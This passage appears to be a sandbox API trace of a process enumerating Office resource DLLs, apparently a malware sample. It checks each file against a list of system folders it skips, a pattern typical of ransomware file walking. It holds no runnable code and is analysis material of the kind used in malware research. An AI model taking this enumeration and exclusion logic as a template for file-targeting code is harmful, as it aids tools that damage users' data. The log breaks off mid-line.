[0126.281] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="windows") returned -1 [0126.281] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="recovery") returned -1 [0126.281] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="perflogs") returned -1 [0126.281] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.281] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.281] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="system volume information") returned -1 [0126.281] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="msocache") returned -1 [0126.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0126.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0126.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d578, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0126.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0126.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.282] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf99462e6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf99462e6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf99462e6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1fda98, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cAlternateFileName="MIF61E~1.DLL")) returned 1 [0126.282] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2=".") returned 1 [0126.282] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="..") returned 1 [0126.282] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="...") returned 1 [0126.282] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="windows") returned -1 [0126.282] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="recovery") returned -1 [0126.282] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="perflogs") returned -1 [0126.282] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.282] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.282] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="system volume information") returned -1 [0126.282] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="msocache") returned -1 [0126.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0126.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20d698, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0126.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0126.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20dde8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0126.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244e58 [0126.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0126.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.283] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc2b31ff, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2b31ff, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2d943c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Layout.resources.dll", cAlternateFileName="MI8E88~1.DLL")) returned 1 [0126.283] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2=".") returned 1 [0126.283] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="..") returned 1 [0126.283] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="...") returned 1 [0126.283] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="windows") returned -1 [0126.283] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="recovery") returned -1 [0126.283] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="perflogs") returned -1 [0126.283] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="documents and settings") returned 1 [0126.283] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.283] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="system volume information") returned -1 [0126.283] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="msocache") returned -1 [0126.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0126.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0126.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0126.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d0d8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0126.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23ddc8 [0126.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244e58 | out: hHeap=0x1e0000) returned 1 [0126.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.283] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf80fc2c4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80fc2c4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80fc2c4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1c030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cAlternateFileName="MI93CC~1.DLL")) returned 1 [0126.283] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2=".") returned 1 [0126.283] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="..") returned 1 [0126.283] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="...") returned 1 [0126.283] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="windows") returned -1 [0126.283] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="recovery") returned -1 [0126.283] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="perflogs") returned -1 [0126.283] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="documents and settings") returned 1 [0126.283] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.284] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="system volume information") returned -1 [0126.284] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="msocache") returned -1 [0126.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20d920, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20dba8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f5f8 [0126.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0126.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.284] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3143659, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf3143659, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf3143659, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e60, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.Interfaces.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0126.284] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2=".") returned 1 [0126.284] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="..") returned 1 [0126.284] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="...") returned 1 [0126.284] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="windows") returned -1 [0126.284] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="recovery") returned -1 [0126.284] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="perflogs") returned -1 [0126.284] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="documents and settings") returned 1 [0126.284] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.284] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="system volume information") returned -1 [0126.284] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="msocache") returned -1 [0126.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20dba8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0126.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20d698, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0126.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e7a0 [0126.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0126.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.285] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x17c93f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17c93f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17c93f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4c050, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.resources.dll", cAlternateFileName="MI9A58~1.DLL")) returned 1 [0126.285] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2=".") returned 1 [0126.285] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="..") returned 1 [0126.285] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="...") returned 1 [0126.285] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="windows") returned -1 [0126.285] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="recovery") returned -1 [0126.285] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="perflogs") returned -1 [0126.285] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="documents and settings") returned 1 [0126.285] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.285] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="system volume information") returned -1 [0126.285] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="msocache") returned -1 [0126.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0126.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d0d8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0126.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0126.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0126.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2475b0 [0126.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0126.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.285] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x305f84a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x305f84a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x36c7dee, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x47088, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cAlternateFileName="MIB24E~1.DLL")) returned 1 [0126.285] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2=".") returned 1 [0126.285] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="..") returned 1 [0126.285] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="...") returned 1 [0126.286] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="windows") returned -1 [0126.286] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="recovery") returned -1 [0126.286] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="perflogs") returned -1 [0126.286] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="documents and settings") returned 1 [0126.286] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.286] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="system volume information") returned -1 [0126.286] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="msocache") returned -1 [0126.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0126.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20d920, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.286] HeapFree (in: 